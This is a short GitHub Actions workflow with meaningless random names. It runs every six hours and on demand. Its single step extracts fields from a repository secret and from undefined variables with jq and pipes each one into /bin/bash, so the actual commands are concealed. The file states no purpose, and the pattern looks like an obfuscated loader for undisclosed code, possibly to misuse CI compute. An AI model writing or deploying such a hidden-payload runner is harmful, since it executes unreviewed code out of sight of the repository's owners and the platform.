name: guoxunsu6789

on:
  workflow_dispatch:
  schedule:
    - cron: '22 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: guoxunsu6789
        env:
          tyjni782: ${{ secrets.tyjni782 }}
        run: |
          echo $tyjni782 | jq -r .nrgk4594 | /bin/bash
          echo $m8740 | jq -r .rao68181 | /bin/bash
          echo $m5057 | jq -r .gpspt9 | /bin/bash
          echo $vy85 | jq -r .awrxw4 | /bin/bash
          echo $mmv22 | jq -r .fbo5 | /bin/bash
          echo $pqe99 | jq -r .skezm6734 | /bin/bash

